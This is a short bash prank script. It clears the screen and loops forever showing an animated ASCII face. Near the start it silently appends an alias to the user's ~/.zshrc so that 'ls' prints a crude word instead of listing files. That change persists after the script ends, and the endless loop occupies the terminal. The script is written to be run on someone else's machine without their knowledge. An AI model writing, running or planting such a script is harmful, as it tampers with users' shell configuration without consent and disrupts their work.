#!/bin/bash

########################COLORS########################

DEFAULT="\033[0m"
HIGHLIGHT="\033[1m"
UNDERLINE="\033[4m"
BLINK="\033[5m"
BLACK="\033[30m"
RED="\033[31m"
GREEN="\033[32m"
YELLOW="\033[33m"
BLUE="\033[34m"
PURPLE="\033[35m"
CYAN="\033[36m"
WHITE="\033[37m"

######################################################
i=0
clear
echo "alias ls=\"echo phallus\"" >> ~/.zshrc
clear
while [ 1 ]
do
	clear
	echo "${RED}    /\\       /\\ \n   /  \\_____/  \\ \n  /             \\ \n (   ()    ()    ) \n(                 ) \n (       Y       ) \n  \\   _______   / \n   \\___________/\n\n\n"

	while [ $i -ne 100 ]
	do
		i=$(($i + 1))
	done
	if [ $i -eq 100 ];
	then
		clear
		echo "    /\\       /\\ \n   /  \\_____/  \\ \n  /             \\ \n (   ()    ()    ) \n(                 ) \n (       Y       ) \n  \\   \\_/\\_/    / \n   \\___________/\n\n\n"
		i=0
		while [ $i -ne 100 ]
		do
			i=$(($i + 1))
		done
		clear
		i=0
	fi
done
###########################################END###################################################
